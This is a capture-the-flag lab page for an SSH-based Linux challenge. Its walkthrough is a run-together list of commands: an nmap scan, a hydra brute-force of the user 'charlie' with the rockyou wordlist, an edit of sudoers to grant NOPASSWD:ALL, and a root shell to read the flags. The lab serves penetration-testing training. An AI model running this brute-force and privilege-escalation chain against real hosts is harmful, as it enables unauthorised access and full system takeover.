Step into the shoes of a penetration tester and tackle this realistic SSH-based challenge. This server might look secure from the outside, but weak credentials and dangerous sudo configurations could be your ticket to complete system compromise. 🎯 Master the art of reconnaissance, brute-force attacks, and privilege escalation in this hands-on Linux exploitation scenario.
Launch your dedicated machine to begin hacking
This walkthrough explains how to hack the lab and capture the flags. For help with Learning Mode questions, use the Request Hint button next to each question.
nmap -sS -sV -Pn <target-ip>ssh <target-ip>hydra -l charlie -P /usr/share/wordlists/rockyou.txt <target-ip> sshssh charlie@<target-ip>sudo -lcat /home/charlie/flag-user.txtsudoedit /etc/sudoerscharlie ALL=(ALL) NOPASSWD:ALLsudo su -cat /root/flag-root.txtChoose how you want to get started
Choose a username to get started
We've sent a 9-character code to your email